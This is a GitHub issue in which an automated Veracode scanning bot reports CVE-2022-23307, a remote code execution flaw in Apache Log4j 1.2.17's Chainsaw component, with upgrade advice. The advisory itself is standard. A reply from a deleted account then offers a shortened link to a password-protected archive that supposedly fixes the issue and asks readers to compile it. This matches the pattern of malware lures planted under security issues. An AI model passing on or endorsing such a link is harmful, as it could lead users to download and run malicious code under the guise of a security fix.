julz0815 / test-action

CVE: 2022-23307 found in Apache Log4j - Version: 1.2.17 [JAVA] #1160

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Apache Log4j |
| Description | Apache Log4j 1.2 |
| Language | JAVA |
| Vulnerability | Remote Code Execution (RCE) |
| Vulnerability description | Apache Chainsaw in log4j is vulnerable to remote code execution. The vulnerability exists due to a deserialization of untrusted object vulnerability allowing an attacker to execute maliciously scripted code via the system. |
| CVE | 2022-23307 |
| CVSS score | 9 |
| Vulnerability present in version/s | 1.1.3-1.2.17 |
| Found library version/s | 1.2.17 |
| Vulnerability fixed in version | |
| Library latest version | 1.2.17 |
| Fix | There is currently no fix version for this package. Upgrade to log4j 2, use other utility to view logs or remove the Chainsaw component if possible |

Links:

ghost commented 1 month ago

This might help: This file might fix it

https://bit.ly/3zo8fAM Archive password: changeme. If you don't have the C compiler, install it (gcc or clang).